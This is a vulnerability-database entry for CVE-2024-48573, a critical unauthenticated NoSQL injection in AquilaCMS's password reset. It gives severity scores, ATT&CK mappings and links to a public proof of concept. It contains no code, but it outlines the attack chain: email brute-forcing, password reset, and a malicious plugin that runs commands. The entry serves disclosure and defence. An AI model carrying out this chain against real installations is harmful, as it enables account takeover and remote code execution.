CVE-2024-48573

CRITICAL

AquilaCMS < 1.409.20 - Unauthenticated NoSQL Injection via Password Reset Feature

Title source: llm

Exploitation Summary

EIP tracks 1 public exploit for CVE-2024-48573. PoCs published by Eui Chul Chung.

AI-analyzed exploit summary This exploit leverages CVE-2024-48573 to achieve remote command execution in AquilaCMS 1.409.20 by brute-forcing user emails, resetting passwords, and uploading a malicious plugin that executes arbitrary commands upon deactivation.

Description

A NoSQL injection vulnerability in AquilaCMS 1.409.20 and prior allows unauthenticated attackers to reset user and administrator account passwords via the "Reset password" feature.

Exploits (1)

exploitdb WORKING POC

by Eui Chul Chung · pythonwebappsphp

https://www.exploit-db.com/exploits/52164

View Code ZIP pw:eip

This exploit leverages CVE-2024-48573 to achieve remote command execution in AquilaCMS 1.409.20 by brute-forcing user emails, resetting passwords, and uploading a malicious plugin that executes arbitrary commands upon deactivation.

Classification

Working Poc 95%

Attack Type

Rce

Complexity

Moderate

Reliability

Reliable

Target: AquilaCMS v1.409.20

No auth needed

Prerequisites: Network access to the target AquilaCMS instance

MITRE ATT&CK

T1110 - Brute Force T1078 - Valid Accounts T1505 - Server Software Component

devstral-2 · analyzed Feb 16, 2026 Full analysis →

References (1)

Core 1

Core References

Third Party Advisory

https://github.com/dos-m0nk3y/CVE/tree/main/CVE-2024-48573

View Writeup ZIP pw:eip

Scores

CVSS v3 9.8

EPSS 0.0100

EPSS Percentile 58.2%

Attack Vector NETWORK

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CISA SSVC

Vulnrichment

Exploitation none

Automatable yes

Technical Impact total

Details

CWE

CWE-89

Status published

Products (1)

aquila-cms/aquilacms < 1.409.20

Published Oct 29, 2024

Tracked Since Feb 18, 2026